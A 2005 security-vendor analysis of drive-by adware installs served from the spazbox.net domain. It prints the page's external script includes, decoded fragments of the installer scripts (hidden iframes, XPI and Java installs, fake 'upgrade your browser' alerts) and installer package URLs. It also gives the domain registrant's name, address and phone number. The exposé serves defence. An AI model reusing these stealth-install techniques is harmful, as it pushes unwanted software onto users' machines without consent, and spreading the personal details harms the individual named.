Anatomy of a Drive-By Install- Even on Firefox

by Jan Hertsens, Wayne Porter

(Everything you wanted to know about drive-by's installs but were afraid to ask.)

Introduction

For the purpose of this test we visited the Spazbox.Net domain to perform a series of tests on what the user experiences at the domain. We specifically selected this domain because it exhibits stealth behavior of software installations. We specifically wanted to dissect these installations through the eyes of a user using one of any of the three most popular browsers including Internet Explorer with Service Pack 2, Firefox and Internet Explorer with Service Pack 1. We have elected not to test Netscape because SpywareWarrior.com has a complete write-up, with video. Note they do have a slightly different approach to their testing. Their write-up is is worthy of reading and understanding as it is directly related to this incident. It also covers separate issues with certain other vendors which we do not touch upon.

Warning: We discourage people without a highly technically background to visit the domain in question. In other words- do not try this at home. All videos have been made by a professional technician on a closed-circuit course. :)

Preparation

Each installation and analysis was performed on a fresh machine. We deactivated any anti-virus or anti-spyware software on the machine. In addition we deactivated XBlock Enterprise perimeter defense product (our own proprietary product in beta testing) so that no programs would be stopped from installation or frozen from operating. We also removed our freeware ActiveX inoculation product. In the case of the Firefox installation we started with a virgin install of the Firefox browser.

What The User Sees

Behavior the use encounters will differ greatly depending on the browser used:

Internet Explorer SP2

• The user will see an elaborate movie explaining how to accept the installation without any reference to what is being installed, why it is being installed, or from where it is being installed. The only information they receive from the movie, aside from install instructions, is a large sign that says THEY MUST INSTALL it.
• View Movie

Mozilla Firefox

• The user will see a virgin installation of FireFox, a rather boring period where we are asked to install the Java Virtual Machine (which would not be applicable for the average user who would already have it installed.) and then a confusing java prompt that requests the users to run an applet. At no point is a EULA or any representation of what is to happen presented.
  
• A few seconds later an Internet Explorer browser window opens up congratulating the user on a successful installation and the tray area shows a new icon bearing the 180solutions logo.
• View Movie

Internet Explorer SP1

• The user will see a blank page so no video capture is possible.
• To show that activity is still happening behind the scenes despite any on screen movement we have attached the following performed packet analysis and extracted the URLS involved. It is notable that the URL log will show over 150 connections happening behind the scenes!
• View Extraction Log
  

Source Code Analysis

Main page

We are examining the source of the default homepage of spazbox.net. The page is devoid of any real content (technically it is not even correct HTML), and only contains this code:

<!-- AUTO PROMPT START -->
<script language="javascript" type="text/javascript" src="http://static.windupdates.com/prompts/a072a874/a577a9.js"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
<!-- AUTO PROMPT END -->

<!-- AUTO_PROMPT AD START -->
<script language='JavaScript' type='text/JavaScript' src='http://install.xxxtoolbar.com/ist/scripts/prompt.php?retry=0&
loadfirst=1&delayload=0&account_id=152854&recurrence=always&adid=a1107890162&
event_type=onload'></script> <script language="JavaScript">self.focus();</script>
<!-- AUTO_PROMPT AD END -->

<!-- AUTO_PROMPT AD START -->
<script language="JavaScript" type="text/JavaScript" src="http://c4tdownload.com/js.php?event_type=onload&recurrence=always&retry=0&loadfirst=1&
account_id=ludicures&delayload=&nogeo=1&adid=d48120fd596713f97724cd146f82622b&cc=0&
axshow=0&idnum=372"></script> <!-- AUTO_PROMPT AD END -->

These are 3 different calls to external Javascript files. We shall examine each Javascript individually.

Javascript Number 1

URL: http://static.windupdates.com/prompts/a072a874/a577a9.js (Cached copy of the script)

This domain is owned by CDT Inc, which is now owned by 180solutions after a recent acquisition of CDT. One page on it has a special note on the EULA mentioning 180solutions and other partners.

Side Note on Windupdates License Agreement: During IE SP1 installs and java installs users are never presented with a EULA or license agreement. However in the case of an install on IE with SP2 (see video) users will see the agreement AFTER the installation of the software and not before.

Users should take special note of Section 15 of the EULA. In this section of the agreement the user cannot participate in a class action suit, but must abide by the AAA. The user also agrees to pay for all direct or indirect costs arising out of the claim including legal costs, transportation, accommodations, and telephone calls. In addition you must pay CDT (now owned by 180solutions) $300 per hour to attend the arbitration including transport time. The cost of arbitration would clearly be far beyond the resources of the average citizen.

Quote from the CDT EULA

15. ARBITRATION. Any claim or controversy arising out of or related to this Agreement, or the products or services we provide and/or distribute shall be settled by binding arbitration in accordance with the rules of the American Arbitration Association. Any such claim or controversy shall be arbitrated on an individual basis and shall not be consolidated with a claim of any other party. You agree to pay any/all direct and/or indirect costs arising out or related to the claim and/or controversy, including but not limited to legal costs, transportation, accommodation, telephone calls. You also agree to pay CDT $300 per hour to attend arbitration including transport time. The foregoing shall not preclude CDT from seeking any injunctive relief for protection of CDT's intellectual property rights.

Analysis

• The file is (by Javascript standards) quite large. It is bigger than all the other scripts combined.
• The file is encoded/obfuscated in a fairly professional manner. If you open it up as-is, it looks more like "line noise" than code. It took several sophisticated tools and hours of poking at it to "break the ice". The results of this work can be seen in this (partially) decoded file. Due to time constraints, we have not been able to fully decode the entire contents, but enough is made visible to give a general idea of the scripts' operation and the details of some of the general tactics.
• Support for ActiveX installs:
  http://static.windupdates.com/cab/CDT/ie/Bridge-c139.cab
• Support for Java based installs:
  http://static.windupdates.com/cab/CDT/java/bridge.jar
• Support for Netscape XPI based installs:
  http://static.windupdates.com/cab/CDT/xpi/install.xpi
• (Yet unanalyzed) code that scans the URL for some curious parts:
  MusicUnlimited|DownloadsUnlimited|GamesUnlimited|AgeVerifier|DownloadAccess|AdultAccess|MusicAccess|MediaAccess|WebsiteAccess|CDT
• Code to detect the presence of some known ActiveX adware components
  ... "bridgex", "winadx", "SyncroAdX", "WinCommX",...
  try { if (new ActiveXObject(gActiveXNamesArray[gLoopIndex] ".installer")) { return true; ....
• Explicit detection and handling of Firefox browsers:
  if (navigator.name == "FireFox" || navigator.name == "Mozilla") {
• Code for logging the installation and creating pop-unders
• Claims that the user will get "something" for free:
  _x5N.innerHTML = 'Install the ActiveX to get the full version for free';
• (Yet unanalyzed) code that appears to open Windows Media Player with a "protected" media file:
  <OBJECT ID='__wmp__' CLASSID='CLSID:6BF52A52-394A-11D3-B153-00C04F79FAA6' width='" lc_protect_wmp_file_width ...

Javascript Number 2

URL: http://install.xxxtoolbar.com/ist/scripts/prompt.php?... (Cached copy of the script)

Analysis

• Seems to be an installer by XXXToolbar for SlotchBar,ISTBar
• Creates an invisible iframe in which it will insert the code to install the ActiveX:
  document.write('<iframe id="downloads_manager" style="position:absolute; visibility:hidden;"></iframe>');
• Repeated prompts for the user to install :
  alert("You must click YES to get access");
• Automatic detection of the Service Pack of Internet Explorer machines:
  if(window.navigator.userAgent.indexOf("SV1") != -1) sp2=true;
• Functionality for attempting a Java based install:
  <APPLET Archive="http://www.ysbweb.com/ist/softwares/v4.0/javainstaller.jar"....
• Functionality for Netscape (and related browsers) XPI based install:
  if (InstallTrigger.updateEnabled()) {
  InstallTrigger.install({'Content Access Plugin 1.01' : 'http://www.xxxtoolbar.com/ist/softwares/v4.0/ist_netscape.xpi'});

Javascript Number 3

URL: http://c4tdownload.com/js.php?... (Cached copy of the script)

Analysis

• Appears to be an installer for Search Miracle
• Creates an invisible iframe in which it will insert the code to install the ActiveX:
  document.write('<iframe id="downloads_manager" style="position:absolute; visibility:hidden;"></iframe>');
• Repeated prompts for the user to install by claiming it will "Upgrade their Internet Explorer Browser" :
  alert("\n\nWe STRONGLY recommend you upgrade your\n\nMicrosoft™ Internet Explorer Browser\n\n\n Click YES Now !\n\n");
  checkretry ;
  alert("\n\nClick YES to upgrade your\n\nMicrosoft™ Internet Explorer Now !\n\n");

Why select Spazbot.net for Analysis?

Initial analysis of this target shows some odd characteristics that prompt the need for investigation. First the site is devoid of content, or appears to be. However, using The Waybackmachine.org you will be able to see several different screen shots starting from 2003 allowing you to gain some insight into the owner. This also tells us there has been activity on this domain from a live person. We also note another domain resides on the machine called Devoid.us. It displays similar characteristics and source code and appears to be owned by the same individual. Unfortunately there is no archived information on Devoid.US site. Fact checking the address at maps.google.com cannot confirm that the address is even a valid mailing address.

Key Facts About SpazBox.net

Server Type: Apache/2.0.50 (FreeBSD)

Ownership Information: History shows a total of ten (10) changes to domain owner records.

Current information ( Date: 04.12.05) reflects current owner and contacts as the following:

Registrant:
John Wilson
16339 stubner arln #503
spring, Texas 77379
United States

Registered through: Blue Razor Domains, Inc.
Domain Name: SPAZBOX.NET
Created on: 19-Nov-03
Expires on: 19-Nov-06
Last Updated on: 27-Mar-05

Administrative/Technical Contact:
Wilson, John spazbox@gmail.com
16339 stubner arln #503
spring, Texas 77379
United States
2818934492

NetBlock Owner: United Colocation Group, Inc (Warning: Their list of hosted domains contains words unsuitable for minors)

Last Changed: According to NetCraft: 04.08.05

Trivia: "spaz" phonetically means "fun" in German.

Key Economic and Distribution Metrics

In this case it is important to look at key SEO metrics as this gives us some insight into the efficacy of the distribution strategy. Alexa data shows significant traffic has flowed through this domain in the past as based on the graphs below.

MarketLeap is a free tool that allows users to gauge estimates of page saturation and link popularity by automating and aggregating queries across multiple search engines. In this case analysis shows Spazbot.net garnering no appreciable search engine saturation (number of pages found in a search engine) across any major search engine. This is strange as most legitimate sites have at least their home page indexed, unless, of course, the site has been penalized by various search engines under their own rules.

More importantly MarketLeap analysis shows no in-bound or incoming links with the exception of one link coming from MSN in the form of an Arabic Message board.

Important Question:
While this domain appears isolated with virtually no links in from any significant search engine, and no page saturation in any search engine it is paradoxical to the Alexa data that shows transient, yet significant traffic spikes throughout the year. In short where are the visitors coming from if they are not coming from the Web? Could traffic be originating from. IRC, SPIM, Word of Mouth, or another source unknown? There is the remote possibility the domain owner could be using U.C.E. to attract visitors but scanning across known repositories of spam operations and USENET abuse reports show no such activity so this has been ruled out.

Obviously the only way to accurately verify traffic would be access to the machine's server logs which are not made public.

Important Questions To Be Asked

1. How can SpazBox.net enter into an affiliate agreement to become a multi-toolbar distributor using a domain with zero content to prove site intent or purpose? More specifically what were the vetting procedures used to select this site as a distribution partner?
2. During the install on the SP2 video are the labeling of xxxtoolbar, CDT and SearchMiracle installations appropriate, accurate and giving enough information for the average user to understand what they are receiving?
3. During the IE Service Pack1 install, the user receives no prompts, no EULA, or license agreement whatsoever. Does this behavior violate any deceptive advertising practices or laws? How can a user be bound by an agreement they are not presented?
4. Why does CDT generate javascript code in an encrypted format designed to make analysis difficult and non-transparent?
5. Since certain distributors claim to verify traffic and scrutinize their affiliate partners with great diligence it is important to note that while the affiliate site shows suspicious traffic patterns, the affiliate site is merely cutting and pasting in standard links from distribution partners. Is the affiliate breaking any of the distributor's TOS?
6. Why do Service Pack 2 users (and only those) see an elaborate movie explaining to them how to accept the installation without any reference to what is being installed, why it is being installed, or from where it is being installed. The only information they receive from the movie, aside from install instructions, is a sign that says THEY MUST INSTALL it.
7. Why are some browser users entitled to less information than other browser users? For example users with IE Service Pack 1 receive no information and only a blank page, while users with Service Pack 2 receive an instructional flash movie on how to install something.
8. Since the affiliate receives compensation per download, why would companies enter into agreements where affiliates can put forth so many programs that a machine’s performance is seriously compromised to the point to where one of our test machine’s required extensive repair as Windows would no longer function properly. If the goal for adware makers is to make money- they why enter into agreements with affiliates that overload machines? This seems to fly into the face of standard performance marketing best practices.

Who to Blame for this Situation- The Facts

Before making any decisions, let us have a look at what (according to our analysis) each actor did:

SpazBox.net (The Affiliate)

• Signed up for various affiliate programs. Source of sign-up or affiliate system undetermined and may be governed by different agreements.
• Cut and pasted standard code from the affiliate program or broker into the empty web page
• Posted Web Page online.
• Directed traffic to the web page through methods unknown and undiscernable at this time.

"Software Makers" (The Distributors)

• Either accepted the affiliate into their program or worked with a broker or sub-broker who accepted the affiliate agreement on that person's behalf
• Provided linking code to this affiliate or as the case may be a deal broker. However we tend to rule out the possibility of the broker arrangement since the linking code appears to use the same static affiliate ID that points directly to the software program distributors domains. This linking code is provided for accurate means in which to calculate compensation.
• The Software Makers Host ALL content used in this scenario including the code signed CAB files, Java packages, and XPI files (for Netscape or Firefox users) and all the javascript seen in action during this scenario.
• Through javascript analysis it can be concluded they implemented routines to install software on or through all major browser platforms.
• Selected wording and graphics to be shown (or not shown) to the user upon, during and before installation.
• In one case a Distributor, "Windupdates", obfuscated their javascript through encryption technology.
• Distributors appear to log all installations of their various software programs including the referral URL and affiliate ID.
• In general served lists of ads to display and keywords to match on to the installed software components.

XBlock's Conclusion

Based on the evidence gathered Spazbox.net did not demonstrate any special technical skills or trickery on the index page of domain based on the code shown above. It appears the owner merely copied and pasted pre-made javascript code that was generated or given to him by the distributor. The only element in his behavior that is unclear is how traffic is being generated to this site in order to drive installations.

It is in our opinion that the software distributors are responsible for any and all behavior that we have documented in the packet logs, screen captures and movies above. The SpazBox.net affiliate had no control over the behavior of the programs or the javascripts as they were executed unless the Distributor allowed him to make modifications but again this is putting the responsibility on behalf of the Disitributor(s).

This article is copyright 2005 by XBlock.com.
It may not be reprinted or copied without the express written consent of the author.

Read other articles (back to full list)